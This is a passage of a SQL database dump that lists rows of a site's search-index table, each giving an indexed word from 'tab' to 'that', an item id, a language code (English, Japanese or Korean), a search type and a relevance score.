('tab', 45, 'en', 'help_search', 1),
('tab', 45, 'ja', 'help_search', 1),
('tab', 45, 'ko', 'help_search', 1),
('tab', 92, 'en', 'help_search', 1),
('tab', 92, 'ja', 'help_search', 1),
('tab', 92, 'ko', 'help_search', 1),
('table', 19, 'en', 'help_search', 1),
('table', 19, 'ja', 'help_search', 1),
('table', 19, 'ko', 'help_search', 1),
('table', 23, 'en', 'help_search', 1),
('table', 23, 'ja', 'help_search', 1),
('table', 23, 'ko', 'help_search', 1),
('table', 42, 'en', 'help_search', 4),
('table', 42, 'ja', 'help_search', 4),
('table', 42, 'ko', 'help_search', 4),
('table', 53, 'en', 'help_search', 1),
('table', 53, 'ja', 'help_search', 1),
('table', 53, 'ko', 'help_search', 1),
('table', 87, 'en', 'help_search', 1),
('table', 87, 'ja', 'help_search', 1),
('table', 87, 'ko', 'help_search', 1),
('table', 89, 'en', 'help_search', 1),
('table', 89, 'ja', 'help_search', 1),
('table', 89, 'ko', 'help_search', 1),
('table', 91, 'en', 'help_search', 4),
('table', 91, 'ja', 'help_search', 4),
('table', 91, 'ko', 'help_search', 4),
('table', 93, 'en', 'help_search', 2.85746),
('table', 93, 'ja', 'help_search', 2.85746),
('table', 93, 'ko', 'help_search', 2.85746),
('tables', 42, 'en', 'help_search', 1),
('tables', 42, 'ja', 'help_search', 1),
('tables', 42, 'ko', 'help_search', 1),
('tables', 67, 'en', 'help_search', 1),
('tables', 67, 'ja', 'help_search', 1),
('tables', 67, 'ko', 'help_search', 1),
('tablestyle', 89, 'en', 'help_search', 1),
('tablestyle', 89, 'ja', 'help_search', 1),
('tablestyle', 89, 'ko', 'help_search', 1),
('tabs', 60, 'en', 'help_search', 1),
('tabs', 60, 'ja', 'help_search', 1),
('tabs', 60, 'ko', 'help_search', 1),
('tag', 23, 'en', 'help_search', 1),
('tag', 23, 'ja', 'help_search', 1),
('tag', 23, 'ko', 'help_search', 1),
('tag', 28, 'en', 'help_search', 0.822065),
('tag', 28, 'ja', 'help_search', 0.822065),
('tag', 28, 'ko', 'help_search', 0.822065),
('tagging', 80, 'en', 'help_search', 1),
('tagging', 80, 'ja', 'help_search', 1),
('tagging', 80, 'ko', 'help_search', 1),
('tags', 28, 'en', 'help_search', 7.37404),
('tags', 28, 'ja', 'help_search', 7.37404),
('tags', 28, 'ko', 'help_search', 7.37404),
('tags', 80, 'en', 'help_search', 4),
('tags', 80, 'ja', 'help_search', 4),
('tags', 80, 'ko', 'help_search', 4),
('tai', 27, 'en', 'node_search', 0.653974),
('tailored', 62, 'en', 'node_search', 1),
('take', 3, 'en', 'node_search', 1),
('take', 3, 'ko', 'node_search', 1),
('take', 24, 'en', 'node_search', 0.733888),
('take', 70, 'en', 'help_search', 1),
('take', 70, 'ja', 'help_search', 1),
('take', 70, 'ko', 'help_search', 1),
('take', 76, 'en', 'help_search', 1),
('take', 76, 'ja', 'help_search', 1),
('take', 76, 'ko', 'help_search', 1),
('take', 77, 'en', 'node_search', 4),
('take', 81, 'en', 'help_search', 1),
('take', 81, 'ja', 'help_search', 1),
('take', 81, 'ko', 'help_search', 1),
('take', 186, 'en', 'node_search', 1),
('take', 190, 'en', 'node_search', 1),
('take', 199, 'en', 'node_search', 1),
('taken', 60, 'en', 'help_search', 1),
('taken', 60, 'ja', 'help_search', 1),
('taken', 60, 'ko', 'help_search', 1),
('taken', 169, 'en', 'node_search', 1),
('taken', 171, 'en', 'node_search', 1),
('taken', 173, 'en', 'node_search', 1),
('taken', 174, 'en', 'node_search', 1),
('taken', 175, 'en', 'node_search', 1),
('taken', 177, 'en', 'node_search', 1),
('takes', 22, 'en', 'help_search', 1),
('takes', 22, 'ja', 'help_search', 1),
('takes', 22, 'ko', 'help_search', 1),
('takes', 28, 'en', 'help_search', 1),
('takes', 28, 'ja', 'help_search', 1),
('takes', 28, 'ko', 'help_search', 1),
('taking', 81, 'en', 'help_search', 26),
('taking', 81, 'ja', 'help_search', 26),
('taking', 81, 'ko', 'help_search', 26),
('talent', 24, 'en', 'node_search', 0.736141),
('talented', 23, 'en', 'node_search', 0.76431),
('talented', 157, 'en', 'node_search', 1),
('tandar', 167, 'en', 'node_search', 1),
('tandar', 167, 'ja', 'node_search', 1),
('tango', 62, 'en', 'node_search', 0.869951),
('target', 8, 'en', 'help_search', 4),
('target', 8, 'ja', 'help_search', 4),
('target', 8, 'ko', 'help_search', 4),
('task', 22, 'en', 'help_search', 0.980874),
('task', 22, 'ja', 'help_search', 0.980874),
('task', 22, 'ko', 'help_search', 0.980874),
('task', 32, 'en', 'help_search', 3.99731),
('task', 32, 'ja', 'help_search', 3.99731),
('task', 32, 'ko', 'help_search', 3.99731),
('task', 46, 'en', 'help_search', 1),
('task', 46, 'ja', 'help_search', 1),
('task', 46, 'ko', 'help_search', 1),
('task', 67, 'en', 'help_search', 0.913226),
('task', 67, 'ja', 'help_search', 0.913226),
('task', 67, 'ko', 'help_search', 0.913226),
('tasks', 2, 'en', 'help_search', 1),
('tasks', 2, 'ja', 'help_search', 1),
('tasks', 2, 'ko', 'help_search', 1),
('tasks', 11, 'en', 'help_search', 0.851346),
('tasks', 11, 'ja', 'help_search', 0.851346),
('tasks', 11, 'ko', 'help_search', 0.851346),
('tasks', 20, 'en', 'help_search', 20),
('tasks', 20, 'ja', 'help_search', 20),
('tasks', 20, 'ko', 'help_search', 20),
('tasks', 22, 'en', 'help_search', 2),
('tasks', 22, 'ja', 'help_search', 2),
('tasks', 22, 'ko', 'help_search', 2),
('tasks', 29, 'en', 'help_search', 0.942091),
('tasks', 29, 'ja', 'help_search', 0.942091),
('tasks', 29, 'ko', 'help_search', 0.942091),
('tasks', 30, 'en', 'help_search', 1.42247),
('tasks', 30, 'ja', 'help_search', 1.42247),
('tasks', 30, 'ko', 'help_search', 1.42247),
('tasks', 32, 'en', 'help_search', 32.4456),
('tasks', 32, 'ja', 'help_search', 32.4456),
('tasks', 32, 'ko', 'help_search', 32.4456),
('tasks', 33, 'en', 'help_search', 1),
('tasks', 33, 'ja', 'help_search', 1),
('tasks', 33, 'ko', 'help_search', 1),
('tasks', 34, 'en', 'help_search', 1),
('tasks', 34, 'ja', 'help_search', 1),
('tasks', 34, 'ko', 'help_search', 1),
('tasks', 35, 'en', 'help_search', 0.961087),
('tasks', 35, 'ja', 'help_search', 0.961087),
('tasks', 35, 'ko', 'help_search', 0.961087),
('tasks', 36, 'en', 'help_search', 1),
('tasks', 36, 'ja', 'help_search', 1),
('tasks', 36, 'ko', 'help_search', 1),
('tasks', 38, 'en', 'help_search', 20),
('tasks', 38, 'ja', 'help_search', 20),
('tasks', 38, 'ko', 'help_search', 20),
('tasks', 40, 'en', 'help_search', 1),
('tasks', 40, 'ja', 'help_search', 1),
('tasks', 40, 'ko', 'help_search', 1),
('tasks', 41, 'en', 'help_search', 1),
('tasks', 41, 'ja', 'help_search', 1),
('tasks', 41, 'ko', 'help_search', 1),
('tasks', 43, 'en', 'help_search', 4),
('tasks', 43, 'ja', 'help_search', 4),
('tasks', 43, 'ko', 'help_search', 4),
('tasks', 57, 'en', 'help_search', 1),
('tasks', 57, 'ja', 'help_search', 1),
('tasks', 57, 'ko', 'help_search', 1),
('tasks', 62, 'en', 'help_search', 1),
('tasks', 62, 'ja', 'help_search', 1),
('tasks', 62, 'ko', 'help_search', 1),
('tasks', 65, 'en', 'help_search', 1),
('tasks', 65, 'ja', 'help_search', 1),
('tasks', 65, 'ko', 'help_search', 1),
('tasks', 68, 'en', 'help_search', 0.786915),
('tasks', 68, 'ja', 'help_search', 0.786915),
('tasks', 68, 'ko', 'help_search', 0.786915),
('tasks', 80, 'en', 'help_search', 0.896076),
('tasks', 80, 'ja', 'help_search', 0.896076),
('tasks', 80, 'ko', 'help_search', 0.896076),
('tasks', 84, 'en', 'help_search', 1),
('tasks', 84, 'ja', 'help_search', 1),
('tasks', 84, 'ko', 'help_search', 1),
('tasks', 93, 'en', 'help_search', 0.784336),
('tasks', 93, 'ja', 'help_search', 0.784336),
('tasks', 93, 'ko', 'help_search', 0.784336),
('taste', 11, 'en', 'help_search', 1),
('taste', 11, 'ja', 'help_search', 1),
('taste', 11, 'ko', 'help_search', 1),
('taught', 28, 'en', 'node_search', 1),
('taung', 31, 'en', 'node_search', 0.833529),
('taw', 27, 'en', 'node_search', 1),
('tax', 8, 'en', 'node_search', 2),
('tax', 31, 'en', 'node_search', 1),
('taxes', 23, 'en', 'node_search', 1),
('taxonomy', 43, 'en', 'help_search', 0.961087),
('taxonomy', 43, 'ja', 'help_search', 0.961087),
('taxonomy', 43, 'ko', 'help_search', 0.961087),
('taxonomy', 63, 'en', 'help_search', 1),
('taxonomy', 63, 'ja', 'help_search', 1),
('taxonomy', 63, 'ko', 'help_search', 1),
('taxonomy', 65, 'en', 'help_search', 2),
('taxonomy', 65, 'ja', 'help_search', 2),
('taxonomy', 65, 'ko', 'help_search', 2),
('taxonomy', 79, 'en', 'help_search', 64),
('taxonomy', 79, 'ja', 'help_search', 64),
('taxonomy', 79, 'ko', 'help_search', 64),
('taxonomy', 80, 'en', 'help_search', 89.5416),
('taxonomy', 80, 'ja', 'help_search', 89.5416),
('taxonomy', 80, 'ko', 'help_search', 89.5416),
('teach', 4, 'en', 'node_search', 2),
('teach', 4, 'ja', 'node_search', 2),
('teach', 24, 'en', 'node_search', 0.797402),
('teacher', 4, 'en', 'node_search', 2),
('teacher', 4, 'ja', 'node_search', 2),
('teachers', 67, 'ja', 'node_search', 1),
('teachers', 133, 'en', 'node_search', 1),
('teachers', 136, 'en', 'node_search', 1),
('teachers', 138, 'en', 'node_search', 1),
('teachers', 142, 'en', 'node_search', 1),
('teaching', 4, 'en', 'node_search', 1),
('teaching', 4, 'ja', 'node_search', 1),
('teaching', 23, 'en', 'node_search', 0.781775),
('teaching', 24, 'en', 'node_search', 2),
('teaching', 28, 'en', 'node_search', 28),
('team', 38, 'en', 'help_search', 11),
('team', 38, 'ja', 'help_search', 11),
('team', 38, 'ko', 'help_search', 11),
('team', 156, 'en', 'node_search', 1),
('team', 157, 'en', 'node_search', 1),
('technical', 7, 'en', 'node_search', 2),
('technical', 7, 'ko', 'node_search', 2),
('technical', 27, 'en', 'node_search', 0.7017),
('technical', 122, 'en', 'node_search', 1),
('technically', 80, 'en', 'help_search', 1),
('technically', 80, 'ja', 'help_search', 1),
('technically', 80, 'ko', 'help_search', 1),
('technician', 3, 'en', 'node_search', 1),
('technician', 3, 'ko', 'node_search', 1),
('technician', 7, 'en', 'node_search', 2),
('technician', 7, 'ko', 'node_search', 2),
('technician', 8, 'en', 'node_search', 27),
('technician', 19, 'en', 'node_search', 3),
('technician', 19, 'ko', 'node_search', 3),
('technician', 24, 'en', 'node_search', 1),
('technicians', 7, 'en', 'node_search', 6),
('technicians', 7, 'ko', 'node_search', 10),
('technologies', 23, 'en', 'node_search', 0.851346),
('technologies', 68, 'en', 'help_search', 1),
('technologies', 68, 'ja', 'help_search', 1),
('technologies', 68, 'ko', 'help_search', 1),
('technology', 3, 'en', 'node_search', 1),
('technology', 3, 'ko', 'node_search', 1),
('technology', 42, 'en', 'help_search', 1),
('technology', 42, 'ja', 'help_search', 1),
('technology', 42, 'ko', 'help_search', 1),
('technology', 68, 'en', 'help_search', 1),
('technology', 68, 'ja', 'help_search', 1),
('technology', 68, 'ko', 'help_search', 1),
('tell', 3, 'en', 'node_search', 1),
('tell', 3, 'ko', 'node_search', 1),
('template', 29, 'en', 'help_search', 1),
('template', 29, 'ja', 'help_search', 1),
('template', 29, 'ko', 'help_search', 1),
('temporarily', 22, 'en', 'help_search', 1),
('temporarily', 22, 'ja', 'help_search', 1),
('temporarily', 22, 'ko', 'help_search', 1),
('temporary', 31, 'ja', 'help_search', 1),
('temporary', 66, 'en', 'help_search', 1),
('temporary', 66, 'ja', 'help_search', 1),
('tender', 23, 'ko', 'node_search', 0.972861),
('tenders', 23, 'en', 'node_search', 1),
('term', 63, 'en', 'help_search', 1),
('term', 63, 'ja', 'help_search', 1),
('term', 63, 'ko', 'help_search', 1),
('term', 65, 'en', 'help_search', 2),
('term', 65, 'ja', 'help_search', 2),
('term', 65, 'ko', 'help_search', 2),
('term', 79, 'en', 'help_search', 7),
('term', 79, 'ja', 'help_search', 7),
('term', 79, 'ko', 'help_search', 7),
('term', 80, 'en', 'help_search', 2.92613),
('term', 80, 'ja', 'help_search', 2.92613),
('term', 80, 'ko', 'help_search', 2.92613),
('terms', 30, 'en', 'help_search', 0.822065),
('terms', 30, 'ja', 'help_search', 0.822065),
('terms', 30, 'ko', 'help_search', 0.822065),
('terms', 79, 'en', 'help_search', 6),
('terms', 79, 'ja', 'help_search', 6),
('terms', 79, 'ko', 'help_search', 6),
('terms', 80, 'en', 'help_search', 13.9347),
('terms', 80, 'ja', 'help_search', 13.9347),
('terms', 80, 'ko', 'help_search', 13.9347),
('test', 11, 'en', 'help_search', 0.942091),
('test', 11, 'ja', 'help_search', 0.942091),
('test', 11, 'ko', 'help_search', 0.942091),
('test', 19, 'en', 'node_search', 28),
('test', 19, 'ko', 'node_search', 28),
('test', 24, 'en', 'node_search', 1.78178),
('test', 24, 'ja', 'node_search', 0.441832),
('test', 25, 'ja', 'help_search', 1),
('test', 26, 'en', 'help_search', 1),
('test', 26, 'ja', 'help_search', 1),
('test', 26, 'ko', 'help_search', 1),
('test', 29, 'en', 'node_search', 3),
('test', 29, 'ja', 'node_search', 3),
('test', 29, 'ko', 'node_search', 3),
('test', 31, 'en', 'node_search', 2.96498),
('test', 181, 'en', 'node_search', 1),
('test', 182, 'en', 'node_search', 1),
('test', 183, 'en', 'node_search', 1),
('testament', 62, 'en', 'node_search', 1),
('tests', 23, 'en', 'node_search', 0.808176),
('text', 4, 'en', 'help_search', 1),
('text', 4, 'ja', 'help_search', 1),
('text', 4, 'ko', 'help_search', 1),
('text', 11, 'en', 'help_search', 1),
('text', 11, 'ja', 'help_search', 1),
('text', 11, 'ko', 'help_search', 1),
('text', 13, 'en', 'help_search', 3),
('text', 13, 'ja', 'help_search', 3),
('text', 13, 'ko', 'help_search', 3),
('text', 15, 'en', 'help_search', 1),
('text', 15, 'ja', 'help_search', 1),
('text', 15, 'ko', 'help_search', 1),
('text', 16, 'en', 'help_search', 1),
('text', 16, 'ja', 'help_search', 1),
('text', 16, 'ko', 'help_search', 1),
('text', 17, 'en', 'help_search', 1),
('text', 17, 'ja', 'help_search', 1),
('text', 17, 'ko', 'help_search', 1),
('text', 23, 'en', 'help_search', 108.144),
('text', 23, 'ja', 'help_search', 108.144),
('text', 23, 'ko', 'help_search', 108.144),
('text', 24, 'en', 'help_search', 5),
('text', 24, 'ja', 'help_search', 5),
('text', 24, 'ko', 'help_search', 5),
('text', 25, 'ja', 'help_search', 1),
('text', 27, 'en', 'help_search', 5),
('text', 27, 'ja', 'help_search', 5),
('text', 27, 'ko', 'help_search', 5),
('text', 28, 'en', 'help_search', 163.01),
('text', 28, 'ja', 'help_search', 163.01),
('text', 28, 'ko', 'help_search', 163.01),
('text', 29, 'en', 'help_search', 1),
('text', 29, 'ja', 'help_search', 1),
('text', 29, 'ko', 'help_search', 1),
('text', 31, 'ja', 'help_search', 39.8545),
('text', 41, 'en', 'help_search', 23),
('text', 41, 'ja', 'help_search', 23),
('text', 41, 'ko', 'help_search', 23),
('text', 44, 'en', 'help_search', 1),
('text', 44, 'ja', 'help_search', 1),
('text', 44, 'ko', 'help_search', 1),
('text', 45, 'en', 'help_search', 1),
('text', 45, 'ja', 'help_search', 1),
('text', 45, 'ko', 'help_search', 1),
('text', 46, 'en', 'help_search', 2),
('text', 46, 'ja', 'help_search', 2),
('text', 46, 'ko', 'help_search', 2),
('text', 50, 'en', 'help_search', 7),
('text', 50, 'ja', 'help_search', 7),
('text', 50, 'ko', 'help_search', 7),
('text', 51, 'en', 'help_search', 1),
('text', 51, 'ja', 'help_search', 1),
('text', 51, 'ko', 'help_search', 1),
('text', 52, 'en', 'help_search', 28),
('text', 52, 'ja', 'help_search', 28),
('text', 52, 'ko', 'help_search', 28),
('text', 53, 'en', 'help_search', 1),
('text', 53, 'ja', 'help_search', 1),
('text', 53, 'ko', 'help_search', 1),
('text', 56, 'en', 'help_search', 1),
('text', 56, 'ja', 'help_search', 1),
('text', 56, 'ko', 'help_search', 1),
('text', 62, 'en', 'help_search', 1),
('text', 62, 'ja', 'help_search', 1),
('text', 62, 'ko', 'help_search', 1),
('text', 86, 'en', 'help_search', 21.9849),
('text', 86, 'ja', 'help_search', 21.9849),
('text', 86, 'ko', 'help_search', 21.9849),
('text', 87, 'en', 'help_search', 1),
('text', 87, 'ja', 'help_search', 1),
('text', 87, 'ko', 'help_search', 1),
('text', 204, 'en', 'node_search', 4),
('text', 204, 'ja', 'node_search', 4),
('textbook', 62, 'en', 'node_search', 1.807),
('textbook', 66, 'en', 'node_search', 2),
('textbook', 155, 'en', 'node_search', 1),
('thae', 93, 'en', 'node_search', 2),
('thae', 93, 'ja', 'node_search', 2),
('thae', 102, 'en', 'node_search', 31),
('thae', 102, 'ja', 'node_search', 31),
('thae', 108, 'en', 'node_search', 2),
('thae', 108, 'ja', 'node_search', 2),
('thae', 113, 'en', 'node_search', 2),
('thae', 113, 'ja', 'node_search', 2),
('thae', 123, 'en', 'node_search', 28),
('thae', 123, 'ja', 'node_search', 31),
('thae', 128, 'en', 'node_search', 31),
('thae', 128, 'ja', 'node_search', 31),
('thae', 134, 'en', 'node_search', 1),
('thae', 134, 'ja', 'node_search', 1),
('thae', 165, 'en', 'node_search', 1),
('thae', 165, 'ja', 'node_search', 1),
('thailand', 23, 'en', 'node_search', 0.882818),
('thailand', 24, 'en', 'node_search', 1.88282),
('than', 4, 'en', 'help_search', 1),
('than', 4, 'ja', 'help_search', 1),
('than', 4, 'ko', 'help_search', 1),
('than', 7, 'en', 'node_search', 2),
('than', 7, 'ko', 'node_search', 2),
('than', 8, 'en', 'node_search', 2),
('than', 20, 'en', 'help_search', 1),
('than', 20, 'ja', 'help_search', 1),
('than', 20, 'ko', 'help_search', 1),
('than', 23, 'en', 'node_search', 2);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('than', 30, 'en', 'help_search', 1.46654),
('than', 30, 'ja', 'help_search', 1.46654),
('than', 30, 'ko', 'help_search', 1.46654),
('than', 37, 'en', 'help_search', 1),
('than', 37, 'ja', 'help_search', 1),
('than', 37, 'ko', 'help_search', 1),
('than', 47, 'en', 'help_search', 1),
('than', 47, 'ja', 'help_search', 1),
('than', 47, 'ko', 'help_search', 1),
('than', 50, 'en', 'help_search', 1),
('than', 50, 'ja', 'help_search', 1),
('than', 50, 'ko', 'help_search', 1),
('than', 52, 'en', 'help_search', 1),
('than', 52, 'ja', 'help_search', 1),
('than', 52, 'ko', 'help_search', 1),
('than', 57, 'en', 'help_search', 1),
('than', 57, 'ja', 'help_search', 1),
('than', 57, 'ko', 'help_search', 1),
('than', 59, 'en', 'help_search', 1),
('than', 59, 'ja', 'help_search', 1),
('than', 59, 'ko', 'help_search', 1),
('than', 67, 'en', 'help_search', 1),
('than', 67, 'ja', 'help_search', 1),
('than', 67, 'ko', 'help_search', 1),
('than', 73, 'en', 'help_search', 1),
('than', 73, 'ja', 'help_search', 1),
('than', 73, 'ko', 'help_search', 1),
('than', 74, 'en', 'help_search', 1),
('than', 74, 'ja', 'help_search', 1),
('than', 74, 'ko', 'help_search', 1),
('than', 92, 'en', 'help_search', 1),
('than', 92, 'ja', 'help_search', 1),
('than', 92, 'ko', 'help_search', 1),
('than', 108, 'en', 'node_search', 2),
('than', 108, 'ja', 'node_search', 2),
('than', 113, 'en', 'node_search', 2),
('than', 113, 'ja', 'node_search', 2),
('than', 144, 'en', 'node_search', 31),
('than', 144, 'ja', 'node_search', 31),
('than', 149, 'en', 'node_search', 1),
('than', 173, 'en', 'node_search', 1),
('than', 173, 'ja', 'node_search', 1),
('than', 185, 'en', 'node_search', 3),
('than', 185, 'ja', 'node_search', 4.00925),
('than', 197, 'en', 'node_search', 1),
('thandar', 89, 'en', 'node_search', 2),
('thandar', 89, 'ja', 'node_search', 2),
('thandar', 115, 'en', 'node_search', 28),
('thandar', 115, 'ja', 'node_search', 28),
('thandar', 157, 'en', 'node_search', 1),
('thandar', 157, 'ja', 'node_search', 1),
('thandar', 161, 'en', 'node_search', 5),
('thandar', 161, 'ja', 'node_search', 1.74996),
('thandar', 169, 'en', 'node_search', 1),
('thandar', 169, 'ja', 'node_search', 1),
('thandar', 179, 'en', 'node_search', 3),
('thandar', 179, 'ja', 'node_search', 1.73614),
('thandar', 198, 'en', 'node_search', 2),
('thandar', 198, 'ja', 'node_search', 1.78178),
('thank', 1, 'en', 'node_search', 1),
('thank', 69, 'en', 'node_search', 1),
('thank', 135, 'en', 'node_search', 1),
('thant', 79, 'en', 'node_search', 1),
('thant', 80, 'en', 'node_search', 5),
('thant', 80, 'ja', 'node_search', 4.99731),
('thant', 92, 'en', 'node_search', 2),
('thant', 92, 'ja', 'node_search', 2),
('thant', 93, 'en', 'node_search', 27),
('thant', 121, 'en', 'node_search', 28),
('thant', 121, 'ja', 'node_search', 31),
('thant', 130, 'en', 'node_search', 1),
('thant', 130, 'ja', 'node_search', 1),
('thant', 153, 'en', 'node_search', 1),
('thant', 153, 'ja', 'node_search', 1),
('thant', 157, 'en', 'node_search', 1),
('thant', 157, 'ja', 'node_search', 1),
('thant', 173, 'en', 'node_search', 1),
('thant', 173, 'ja', 'node_search', 1),
('thant', 190, 'en', 'node_search', 6),
('thant', 190, 'ja', 'node_search', 4.07688),
('thari', 129, 'en', 'node_search', 28),
('thari', 129, 'ja', 'node_search', 28),
('that', 1, 'en', 'help_search', 3),
('that', 1, 'ja', 'help_search', 3),
('that', 1, 'ko', 'help_search', 3),
('that', 2, 'en', 'help_search', 1),
('that', 2, 'ja', 'help_search', 1),
('that', 2, 'ko', 'help_search', 1),
('that', 3, 'en', 'help_search', 2),
('that', 3, 'ja', 'help_search', 2),
('that', 3, 'ko', 'help_search', 2),
('that', 4, 'en', 'node_search', 1),
('that', 4, 'ja', 'node_search', 1),
('that', 6, 'en', 'help_search', 2),
('that', 6, 'ja', 'help_search', 2),
('that', 6, 'ko', 'help_search', 2),
('that', 7, 'en', 'help_search', 3),
('that', 7, 'ja', 'help_search', 3),
('that', 7, 'ko', 'help_search', 3),
('that', 9, 'en', 'help_search', 2),
('that', 9, 'ja', 'help_search', 2),
('that', 9, 'ko', 'help_search', 2),
('that', 10, 'en', 'help_search', 1),
('that', 10, 'ja', 'help_search', 1),
('that', 10, 'ko', 'help_search', 1),
('that', 11, 'en', 'help_search', 4.88282),
('that', 11, 'ja', 'help_search', 4.88282),
('that', 11, 'ko', 'help_search', 4.88282),
('that', 13, 'en', 'help_search', 1),
('that', 13, 'ja', 'help_search', 1),
('that', 13, 'ko', 'help_search', 1),
('that', 14, 'en', 'help_search', 2),
('that', 14, 'ja', 'help_search', 2),
('that', 14, 'ko', 'help_search', 2),
('that', 15, 'en', 'help_search', 3),
('that', 15, 'ja', 'help_search', 3),
('that', 15, 'ko', 'help_search', 3),
('that', 16, 'en', 'help_search', 2),
('that', 16, 'ja', 'help_search', 2),
('that', 16, 'ko', 'help_search', 2),
('that', 17, 'en', 'help_search', 1),
('that', 17, 'ja', 'help_search', 1),
('that', 17, 'ko', 'help_search', 1),
('that', 18, 'en', 'help_search', 1),
('that', 18, 'ja', 'help_search', 1),
('that', 18, 'ko', 'help_search', 1),
('that', 20, 'en', 'help_search', 1),
('that', 20, 'ja', 'help_search', 1),
('that', 20, 'ko', 'help_search', 1),
('that', 22, 'en', 'help_search', 6.98902),
('that', 22, 'ja', 'help_search', 6.98902),
('that', 22, 'ko', 'help_search', 6.98902),
('that', 23, 'en', 'help_search', 5.82864),
('that', 23, 'en', 'node_search', 0.769219),
('that', 23, 'ja', 'help_search', 5.82864),
('that', 23, 'ko', 'help_search', 5.82864),
('that', 24, 'en', 'help_search', 1),
('that', 24, 'en', 'node_search', 1.80007),
('that', 24, 'ja', 'help_search', 1),
('that', 24, 'ko', 'help_search', 1),
('that', 25, 'en', 'help_search', 3),
('that', 25, 'en', 'node_search', 1),
('that', 25, 'ja', 'help_search', 3),
('that', 26, 'en', 'help_search', 2),
('that', 26, 'en', 'node_search', 2),
('that', 26, 'ja', 'help_search', 2),
('that', 26, 'ko', 'help_search', 2),
('that', 27, 'en', 'help_search', 3),
('that', 27, 'ja', 'help_search', 3),
('that', 27, 'ko', 'help_search', 3),
('that', 28, 'en', 'help_search', 8.85086),
('that', 28, 'ja', 'help_search', 8.85086),
('that', 28, 'ko', 'help_search', 8.85086),
('that', 29, 'en', 'help_search', 5),
('that', 29, 'ja', 'help_search', 5),
('that', 29, 'ko', 'help_search', 5),
('that', 30, 'en', 'help_search', 6.30646),
('that', 30, 'ja', 'help_search', 6.30646),
('that', 30, 'ko', 'help_search', 6.30646),
('that', 31, 'en', 'node_search', 1),
('that', 31, 'ja', 'help_search', 8.69588),
('that', 32, 'en', 'help_search', 3),
('that', 32, 'ja', 'help_search', 3),
('that', 32, 'ko', 'help_search', 3),
('that', 33, 'en', 'help_search', 3),
('that', 33, 'ja', 'help_search', 3),
('that', 33, 'ko', 'help_search', 3),
('that', 34, 'en', 'help_search', 4),
('that', 34, 'ja', 'help_search', 4),
('that', 34, 'ko', 'help_search', 4),
('that', 35, 'en', 'help_search', 1),
('that', 35, 'ja', 'help_search', 1),
('that', 35, 'ko', 'help_search', 1),
('that', 37, 'en', 'help_search', 2.9347),
('that', 37, 'ja', 'help_search', 2.9347),
('that', 37, 'ko', 'help_search', 2.9347),
('that', 38, 'en', 'help_search', 1),
('that', 38, 'ja', 'help_search', 1),
('that', 38, 'ko', 'help_search', 1),
('that', 39, 'en', 'help_search', 3),
('that', 39, 'ja', 'help_search', 3),
('that', 39, 'ko', 'help_search', 3),
('that', 40, 'en', 'help_search', 2),
('that', 40, 'ja', 'help_search', 2),
('that', 40, 'ko', 'help_search', 2),
('that', 41, 'en', 'help_search', 4),
('that', 41, 'ja', 'help_search', 4),
('that', 41, 'ko', 'help_search', 4),
('that', 42, 'en', 'help_search', 2),
('that', 42, 'ja', 'help_search', 2),
('that', 42, 'ko', 'help_search', 2),
('that', 43, 'en', 'help_search', 1),
('that', 43, 'ja', 'help_search', 1),
('that', 43, 'ko', 'help_search', 1),
('that', 44, 'en', 'help_search', 2),
('that', 44, 'ja', 'help_search', 2),
('that', 44, 'ko', 'help_search', 2),
('that', 45, 'en', 'help_search', 5),
('that', 45, 'ja', 'help_search', 5),
('that', 45, 'ko', 'help_search', 5),
('that', 47, 'en', 'help_search', 2),
('that', 47, 'ja', 'help_search', 2),
('that', 47, 'ko', 'help_search', 2),
('that', 50, 'en', 'help_search', 2.96498),
('that', 50, 'ja', 'help_search', 2.96498),
('that', 50, 'ko', 'help_search', 2.96498),
('that', 52, 'en', 'help_search', 2),
('that', 52, 'ja', 'help_search', 2),
('that', 52, 'ko', 'help_search', 2),
('that', 53, 'en', 'help_search', 2),
('that', 53, 'ja', 'help_search', 2),
('that', 53, 'ko', 'help_search', 2),
('that', 54, 'en', 'help_search', 4),
('that', 54, 'ja', 'help_search', 4),
('that', 54, 'ko', 'help_search', 4),
('that', 55, 'en', 'help_search', 2),
('that', 55, 'ja', 'help_search', 2),
('that', 55, 'ko', 'help_search', 2),
('that', 56, 'en', 'help_search', 3),
('that', 56, 'ja', 'help_search', 3),
('that', 56, 'ko', 'help_search', 3),
('that', 58, 'en', 'help_search', 1),
('that', 58, 'ja', 'help_search', 1),
('that', 58, 'ko', 'help_search', 1),
('that', 59, 'en', 'help_search', 1),
('that', 59, 'ja', 'help_search', 1),
('that', 59, 'ko', 'help_search', 1),
('that', 62, 'en', 'help_search', 1),
('that', 62, 'en', 'node_search', 1),
('that', 62, 'ja', 'help_search', 1),
('that', 62, 'ko', 'help_search', 1),
('that', 63, 'en', 'help_search', 1),
('that', 63, 'ja', 'help_search', 1),
('that', 63, 'ko', 'help_search', 1),
('that', 64, 'en', 'help_search', 2),
('that', 64, 'ja', 'help_search', 2),
('that', 64, 'ko', 'help_search', 2),
('that', 65, 'en', 'help_search', 1),
('that', 65, 'ja', 'help_search', 1),
('that', 65, 'ko', 'help_search', 1),
('that', 66, 'en', 'help_search', 3),
('that', 66, 'en', 'node_search', 0.961087),
('that', 66, 'ja', 'help_search', 3),
('that', 67, 'en', 'help_search', 3.82016),
('that', 67, 'ja', 'help_search', 3.82016),
('that', 67, 'ja', 'node_search', 1),
('that', 67, 'ko', 'help_search', 3.82016),
('that', 68, 'en', 'help_search', 7.47776),
('that', 68, 'ja', 'help_search', 7.47776),
('that', 68, 'ko', 'help_search', 7.47776),
('that', 69, 'en', 'help_search', 4.99315),
('that', 69, 'ja', 'help_search', 4.99315),
('that', 69, 'ko', 'help_search', 4.99315),
('that', 70, 'en', 'help_search', 2),
('that', 70, 'ja', 'help_search', 2),
('that', 70, 'ko', 'help_search', 2),
('that', 71, 'en', 'help_search', 5),
('that', 71, 'ja', 'help_search', 5),
('that', 71, 'ko', 'help_search', 5),
('that', 72, 'en', 'help_search', 3.67553),
('that', 72, 'ja', 'help_search', 3.67553),
('that', 72, 'ko', 'help_search', 3.67553),
('that', 74, 'en', 'help_search', 3),
('that', 74, 'ja', 'help_search', 3),
('that', 74, 'ko', 'help_search', 3),
('that', 75, 'en', 'help_search', 2),
('that', 75, 'ja', 'help_search', 2),
('that', 75, 'ko', 'help_search', 2),
('that', 76, 'en', 'help_search', 3),
('that', 76, 'ja', 'help_search', 3),
('that', 76, 'ko', 'help_search', 3),
('that', 77, 'en', 'help_search', 6),
('that', 77, 'ja', 'help_search', 6),
('that', 77, 'ko', 'help_search', 6),
